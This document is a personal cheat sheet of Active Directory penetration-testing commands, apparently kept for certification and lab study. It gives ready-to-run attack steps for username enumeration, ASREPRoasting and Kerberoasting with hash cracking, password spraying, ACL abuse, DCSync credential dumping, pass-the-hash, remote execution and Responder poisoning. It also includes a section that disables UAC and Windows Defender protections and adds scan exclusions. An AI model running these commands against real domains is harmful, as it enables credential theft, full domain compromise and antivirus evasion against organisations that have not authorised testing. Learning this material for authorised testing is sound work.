Pentest_Notes

🏒 Active Directory Penetration Testing

Organized notes for Active Directory penetration testing. Last Updated: 2026-03-27

Overview

Active Directory (AD) is the backbone of most enterprise networks. AD pentesting involves enumerating the domain structure, identifying misconfigurations, exploiting trust relationships, and ultimately achieving domain dominance.

πŸ”— Essential Reference: Pentest AD Mindmap

Reconnaissance β€” Without Credentials

Checklist

User Enumeration with Kerbrute

# Kerbrute user enumeration
/Tools/kerbrute_linux_amd64 userenum -d domain.com --dc <DC_IP> $SECLIST/Usernames/Names/names.txt

# Use statistically likely usernames
# https://github.com/insidetrust/statistically-likely-usernames/tree/master/facebook-base-lists

πŸ’‘ Pro Tip: Continue using Kerbrute until you have the naming schema, many users, and service accounts. Use service-accounts.txt for service account discovery.

ASREPRoasting Without Credentials

impacket-GetNPUsers domain.com/ -usersfile adcreds.txt -dc-ip <DC_IP> -request -outputfile hash.hash

ASREPRoast HackTricks Guide

SMB Enumeration (No Creds)

# Null session share enumeration
nxc smb <DC_IP> -u "" -p "" --shares
nxc smb <DC_IP> -u "guest" -p "" --shares
nxc smb <DC_IP> -u "a" -p "" --shares

# smbclient
smbclient -L //<DC_IP>/ -N

RPC Enumeration (No Creds)

# Null session
rpcclient <DC_IP> -U ""
rpcclient <DC_IP> -U "domain.com\guest"

# Comprehensive RPC enumeration
rpcclient -U 'domain.com\guest' -c "
    srvinfo;
    enumdomusers;
    queryuserdomainsid;
    enumgroups;
    enumdomgroups;
    enumprinters;
    enumservices;
    getdompwinfo;
    lsaenumsid;
    lsaqueryinfopol;
    querydispinfo;
    enumtrustdom;
    netshareenum;
    samrlookuprids;
" <DC_IP>

# SID lookup
lookupsids S-1-5-80-...

# impacket-rpcdump
impacket-rpcdump <DC_IP>

LDAP Enumeration (No Creds)

# Anonymous LDAP dump
ldapdomaindump <DC_IP>

# ldapsearch
ldapsearch -x -h <DC_IP> -b "dc=domain,dc=com"

Additional Unauthenticated Enumeration

# enum4linux
enum4linux -a <DC_IP>

Username as Password Check

nxc smb <DC_IP> -u adcreds.txt -p adcreds.txt --no-bruteforce
nxc smb <DC_IP>-160 --local-auth -u adcreds.txt -p adcreds.txt --no-bruteforce

⚠️ CPTS Exam Tip: Always try username:username for every discovered user. Also try default credentials like offsec:lab.

Enumeration β€” With Credentials

Checklist

Domain Information

# Get domain info
Get-NetDomain
Get-ADDomain

# Identify domain admins
net group "Domain Admins" /domain

# Domain trusts
Get-ADTrust -Filter *
Get-DomainTrust
Get-DomainTrustMapping

# Enterprise admins
net group "Enterprise Admins" /domain

User & Group Enumeration

# Current user info
whoami /groups /fo list | findstr Name
net user <username> /domain

# All domain users
Get-ADUser -Filter * -Properties *

# Service accounts (SPN set)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# Group members
Get-ADGroupMember -Identity "Backup Operators"
net group "Domain Admins" /domain

# OUs
Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName

Password Policy

# CrackMapExec
crackmapexec smb <DC_IP> -u <user> -p <pass> --pass-pol

# rpcclient
rpcclient $> querydominfo

# ldapsearch
ldapsearch -h <DC_IP> -x -b "DC=DOMAIN,DC=COM" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# Windows
net accounts
Get-DomainPolicy

BloodHound Collection & Analysis

# SharpHound collection (from Windows)
.\SharpHound.exe -c All --zipfilename bh.zip

# RustHound (from Linux)
rusthound -d domain.com -u user -p pass -f <DC_IP>

# Parse BloodHound JSON for descriptions
cat domain_users.json | jq '.[] | select(.attributes.description != null and .attributes.description[0] != null) | {sAMAccountName: .attributes.sAMAccountName[0], description: .attributes.description[0]}'

# Alternative BloodHound JSON parsing
cat bloodhound_users.json | jq '.data[] | select(.Properties.description != null) | {samaccountname: .Properties.name, description: .Properties.description}'

⚠️ CPTS Exam Tip: Always check AD user descriptions β€” passwords are frequently stored there.

ACL / ACE Enumeration

# Find interesting ACLs
Find-InterestingDomainAcl | select ObjectDN, AceType

# Get SID of specific user
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley

Share Enumeration with Credentials

# Check all shares
nxc smb <IP_RANGE> -u <user> -p <pass> --shares

# Mount and inspect shares thoroughly
# Use Mythicsoft Agent Ransack to search for files on Windows

LDAP Dump with Credentials

# LDAP dump
ldapdomaindump <DC_IP> -u 'domain\user' -p 'password'

# Check descriptions using jq
cat domain_users.json | jq '...'

Enumeration Resources

Kerberos Attacks

Checklist

πŸ”΄ Warning: Always use FQDNs (e.g., dc01.domain.com) not IP addresses for Kerberos attacks. Kerberos relies on DNS names.

Kerberoasting

# Linux β€” Impacket
impacket-GetUserSPNs -dc-ip <DC_IP> DOMAIN/user -request-user <target> -outputfile tgs.hash

# Enumerate SPNs with NetExec
nxc ldap <DC_IP_RANGE> -u 'user' -p 'password' --kerberoast spns.txt

# Crack TGS hash
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt --force

# Windows β€” Rubeus
.\Rubeus.exe kerberoast /user:testspn /nowrap

# Windows β€” PowerView
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Windows β€” Manual TGS request
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

ASREPRoasting

# Linux
impacket-GetNPUsers domain.com/user:'Password!' -dc-ip <DC_IP> -request -o ./hashes.kerb
kerbrute userenum -d domain.com --dc <DC_IP> /opt/jsmith.txt

# Crack AS-REP hash
hashcat -m 18200 hashes.kerb /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Windows β€” PowerView
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

# Windows β€” Rubeus
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Mimikatz Ticket Operations

# Ensure tickets are in base64
mimikatz # base64 /out:true

# Export tickets
kerberos::list /export

# Convert base64 ticket (Linux)
echo "<base64_blob>" | tr -d \\n
cat encoded_file | base64 -d > ticket.kirbi

# kirbi2john
python2.7 kirbi2john.py ticket.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > hash_for_hashcat

Password Spraying

# Kerbrute
kerbrute passwordspray -d domain.com --dc <DC_IP> valid_users.txt Welcome1

# CrackMapExec β€” safe spraying
sudo crackmapexec smb --local-auth <SUBNET> -u administrator -H <HASH> | grep +

# Windows β€” Invoke-DomainPasswordSpray
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

ACL Abuse

Overview

Access Control List (ACL) abuse is a critical AD attack vector. Misconfigured ACLs can allow privilege escalation through the domain.

# Find ACLs with modification rights to non-built-in objects
Find-InterestingDomainAcl

# Create credentials for ACL abuse
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)

# ForceChangePassword β€” Change user's password
Set-DomainUserPassword -Identity <target> -AccountPassword $newPassword -Credential $Cred -Verbose

# GenericAll/GenericWrite β€” Add to group
Add-DomainGroupMember -Identity 'Target Group' -Members 'attacker' -Credential $Cred -Verbose

# Verify group membership
Get-DomainGroupMember -Identity "Target Group" | Select MemberName

# Set fake SPN for targeted Kerberoasting
Set-DomainObject -Credential $Cred -Identity <target> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

DCSync Attack

# Check user permissions for DCSync
Get-DomainUser -Identity <user> | select samaccountname,objectsid,memberof,useraccountcontrol | fl

# Mimikatz DCSync
mimikatz # lsadump::dcsync /domain:DOMAIN.COM /user:DOMAIN\administrator

# Impacket secretsdump (from Linux)
impacket-secretsdump domain.com/user:'password'@<DC_IP>

Lateral Movement

Checklist

Session Enumeration

.\PsLoggedon.exe -accepteula \\COMPUTERNAME

Pass-the-Hash

# NetExec PtH
nxc smb <IP_RANGE> -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>'

# CrackMapExec PtH
crackmapexec smb <IP_RANGE> -u Administrator -H '<NTLM_HASH>'

# impacket-psexec
impacket-psexec -hashes :<NTLM_HASH> domain.com/administrator@<IP>

Remote Execution with Credentials

# CrackMapExec command execution
crackmapexec smb <IP> -u Administrator -p 'Password!' -x 'whoami' --exec-method smbexec

# PSExec
impacket-psexec domain.com/user:'password'@<IP>

# WinRM
evil-winrm -i <IP> -u user -p 'password'

# PowerShell Remoting
Enter-PSSession -ComputerName <HOST> -Credential $cred

LLMNR/NBT-NS Poisoning

# Run Responder
responder -I eth1

# Crack captured NTLMv2 hashes
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt

Sensitive File Discovery

# Snaffler β€” find sensitive files across shares
.\Snaffler.exe -s -o snaffler_output.txt

Trust Enumeration & Cross-Domain Attacks

# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
Get-DomainTrustMapping

# Enumerate SPNs in trusted domain
Get-DomainUser -SPN -Domain TRUSTEDOMAIN.COM | select SamAccountName

# Enumerate foreign group members
Get-DomainForeignGroupMember -Domain TRUSTEDOMAIN.COM

# Remote session to trusted domain
Enter-PSSession -ComputerName DC03.TRUSTEDOMAIN.COM -Credential DOMAIN\administrator

Miscellaneous Configurations

# Check for MS-PRN Printer Bug
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName DC01.DOMAIN.COM

# Check descriptions for passwords
Get-DomainUser * | Select-Object samaccountname,description

# Find accounts with PASSWD_NOTREQD
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Windows Defender & AV Evasion

Checking Defender Status

Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled, AntispywareEnabled | FL
Get-MpComputerStatus | Select IsTamperProtected, RealTimeProtectionEnabled | FL
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

Disabling Protections (Requires Admin)

# Disable UAC
cmd.exe /c "C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

# Disable realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable IOAV protection
Set-MpPreference -DisableIOAVProtection $true

# Disable behavior monitoring
Set-MPPreference -DisableBehaviorMonitoring $true

# Add exclusion path
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Disable cloud detection
Set-MPPreference -DisableBlockAtFirstSeen $true

# Disable email scanning
Set-MPPreference -DisableEmailScanning $true

# Disable script scanning
Set-MPPReference -DisableScriptScanning $true

# Exclude by extension
Set-MpPreference -ExclusionExtension "ps1"

# Nuclear option β€” disable everything + add exclusion
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"

πŸ”΄ Warning: Disabling AV protections may trigger alerts. Only do this when you have adequate access and operational security.

AppLocker Enumeration

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

AD PowerShell Module

# List available modules
Get-Module

# Import AD module
Import-Module ActiveDirectory

# PowerView import
Set-ExecutionPolicy Bypass -Scope Process
Import-Module C:\Tools\PowerView.ps1

Common Pitfalls / Gotchas

References & Further Reading

Merge wordlists

cat *.txt | sort -u > allnames.txt